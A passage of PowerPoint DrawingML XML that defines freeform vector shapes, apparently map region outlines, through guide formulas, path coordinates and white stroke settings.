                  <a:gd name="T75" fmla="*/ 109 h 130"/>
                  <a:gd name="T76" fmla="*/ 122 w 151"/>
                  <a:gd name="T77" fmla="*/ 111 h 130"/>
                  <a:gd name="T78" fmla="*/ 116 w 151"/>
                  <a:gd name="T79" fmla="*/ 122 h 130"/>
                  <a:gd name="T80" fmla="*/ 115 w 151"/>
                  <a:gd name="T81" fmla="*/ 130 h 130"/>
                  <a:gd name="T82" fmla="*/ 109 w 151"/>
                  <a:gd name="T83" fmla="*/ 125 h 130"/>
                  <a:gd name="T84" fmla="*/ 101 w 151"/>
                  <a:gd name="T85" fmla="*/ 126 h 130"/>
                  <a:gd name="T86" fmla="*/ 95 w 151"/>
                  <a:gd name="T87" fmla="*/ 123 h 130"/>
                  <a:gd name="T88" fmla="*/ 88 w 151"/>
                  <a:gd name="T89" fmla="*/ 125 h 130"/>
                  <a:gd name="T90" fmla="*/ 83 w 151"/>
                  <a:gd name="T91" fmla="*/ 124 h 130"/>
                  <a:gd name="T92" fmla="*/ 76 w 151"/>
                  <a:gd name="T93" fmla="*/ 124 h 130"/>
                  <a:gd name="T94" fmla="*/ 71 w 151"/>
                  <a:gd name="T95" fmla="*/ 125 h 130"/>
                  <a:gd name="T96" fmla="*/ 64 w 151"/>
                  <a:gd name="T97" fmla="*/ 121 h 130"/>
                  <a:gd name="T98" fmla="*/ 56 w 151"/>
                  <a:gd name="T99" fmla="*/ 118 h 130"/>
                  <a:gd name="T100" fmla="*/ 44 w 151"/>
                  <a:gd name="T101" fmla="*/ 115 h 130"/>
                  <a:gd name="T102" fmla="*/ 29 w 151"/>
                  <a:gd name="T103" fmla="*/ 114 h 130"/>
                  <a:gd name="T104" fmla="*/ 17 w 151"/>
                  <a:gd name="T105" fmla="*/ 119 h 130"/>
                  <a:gd name="T106" fmla="*/ 7 w 151"/>
                  <a:gd name="T107" fmla="*/ 122 h 130"/>
                  <a:gd name="T108" fmla="*/ 8 w 151"/>
                  <a:gd name="T109" fmla="*/ 110 h 130"/>
                  <a:gd name="T110" fmla="*/ 1 w 151"/>
                  <a:gd name="T111" fmla="*/ 101 h 130"/>
                  <a:gd name="T112" fmla="*/ 12 w 151"/>
                  <a:gd name="T113" fmla="*/ 89 h 130"/>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51"/>
                  <a:gd name="T172" fmla="*/ 0 h 130"/>
                  <a:gd name="T173" fmla="*/ 151 w 151"/>
                  <a:gd name="T174" fmla="*/ 130 h 130"/>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51" h="130">
                    <a:moveTo>
                      <a:pt x="6" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="62"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36083" name="Freeform 216"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2546" y="2535"/>
                <a:ext cx="261" cy="249"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 123 w 261"/>
                  <a:gd name="T1" fmla="*/ 4 h 249"/>
                  <a:gd name="T2" fmla="*/ 167 w 261"/>
                  <a:gd name="T3" fmla="*/ 37 h 249"/>
                  <a:gd name="T4" fmla="*/ 192 w 261"/>
                  <a:gd name="T5" fmla="*/ 55 h 249"/>
                  <a:gd name="T6" fmla="*/ 211 w 261"/>
                  <a:gd name="T7" fmla="*/ 71 h 249"/>
                  <a:gd name="T8" fmla="*/ 222 w 261"/>
                  <a:gd name="T9" fmla="*/ 82 h 249"/>
                  <a:gd name="T10" fmla="*/ 232 w 261"/>
                  <a:gd name="T11" fmla="*/ 85 h 249"/>
                  <a:gd name="T12" fmla="*/ 242 w 261"/>
                  <a:gd name="T13" fmla="*/ 87 h 249"/>
                  <a:gd name="T14" fmla="*/ 243 w 261"/>
                  <a:gd name="T15" fmla="*/ 99 h 249"/>
                  <a:gd name="T16" fmla="*/ 260 w 261"/>
                  <a:gd name="T17" fmla="*/ 107 h 249"/>
                  <a:gd name="T18" fmla="*/ 260 w 261"/>
                  <a:gd name="T19" fmla="*/ 138 h 249"/>
                  <a:gd name="T20" fmla="*/ 252 w 261"/>
                  <a:gd name="T21" fmla="*/ 160 h 249"/>
                  <a:gd name="T22" fmla="*/ 229 w 261"/>
                  <a:gd name="T23" fmla="*/ 163 h 249"/>
                  <a:gd name="T24" fmla="*/ 211 w 261"/>
                  <a:gd name="T25" fmla="*/ 168 h 249"/>
                  <a:gd name="T26" fmla="*/ 198 w 261"/>
                  <a:gd name="T27" fmla="*/ 169 h 249"/>
                  <a:gd name="T28" fmla="*/ 185 w 261"/>
                  <a:gd name="T29" fmla="*/ 166 h 249"/>
                  <a:gd name="T30" fmla="*/ 166 w 261"/>
                  <a:gd name="T31" fmla="*/ 175 h 249"/>
                  <a:gd name="T32" fmla="*/ 160 w 261"/>
                  <a:gd name="T33" fmla="*/ 183 h 249"/>
                  <a:gd name="T34" fmla="*/ 152 w 261"/>
                  <a:gd name="T35" fmla="*/ 181 h 249"/>
                  <a:gd name="T36" fmla="*/ 141 w 261"/>
                  <a:gd name="T37" fmla="*/ 196 h 249"/>
                  <a:gd name="T38" fmla="*/ 133 w 261"/>
                  <a:gd name="T39" fmla="*/ 196 h 249"/>
                  <a:gd name="T40" fmla="*/ 126 w 261"/>
                  <a:gd name="T41" fmla="*/ 197 h 249"/>
                  <a:gd name="T42" fmla="*/ 119 w 261"/>
                  <a:gd name="T43" fmla="*/ 216 h 249"/>
                  <a:gd name="T44" fmla="*/ 110 w 261"/>
                  <a:gd name="T45" fmla="*/ 220 h 249"/>
                  <a:gd name="T46" fmla="*/ 109 w 261"/>
                  <a:gd name="T47" fmla="*/ 233 h 249"/>
                  <a:gd name="T48" fmla="*/ 105 w 261"/>
                  <a:gd name="T49" fmla="*/ 243 h 249"/>
                  <a:gd name="T50" fmla="*/ 99 w 261"/>
                  <a:gd name="T51" fmla="*/ 247 h 249"/>
                  <a:gd name="T52" fmla="*/ 95 w 261"/>
                  <a:gd name="T53" fmla="*/ 243 h 249"/>
                  <a:gd name="T54" fmla="*/ 92 w 261"/>
                  <a:gd name="T55" fmla="*/ 239 h 249"/>
                  <a:gd name="T56" fmla="*/ 84 w 261"/>
                  <a:gd name="T57" fmla="*/ 247 h 249"/>
                  <a:gd name="T58" fmla="*/ 74 w 261"/>
                  <a:gd name="T59" fmla="*/ 243 h 249"/>
                  <a:gd name="T60" fmla="*/ 64 w 261"/>
                  <a:gd name="T61" fmla="*/ 241 h 249"/>
                  <a:gd name="T62" fmla="*/ 56 w 261"/>
                  <a:gd name="T63" fmla="*/ 224 h 249"/>
                  <a:gd name="T64" fmla="*/ 52 w 261"/>
                  <a:gd name="T65" fmla="*/ 212 h 249"/>
